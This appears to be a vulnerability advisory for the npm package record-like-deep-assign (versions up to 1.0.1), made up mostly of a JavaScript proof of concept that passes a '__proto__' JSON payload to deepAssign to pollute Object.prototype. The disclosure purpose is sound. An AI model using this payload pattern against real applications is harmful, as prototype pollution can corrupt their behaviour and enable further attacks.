All versions of package record-like-deep-assign are vulnerable to Prototype Pollution via the main functionality.
const deepAssign = require('record-like-deep-assign');
let obj = {};
console.log("Before being polluted: " + obj.polluted);
EVIL_JSON = JSON.parse('{"__proto__":{"polluted":true}}');
deepAssign({}, EVIL_JSON);
console.log("After being polluted: " + obj.polluted);
CPE | Name | Operator | Version |
---|---|---|---|
record-like-deep-assign | le | 1.0.1 |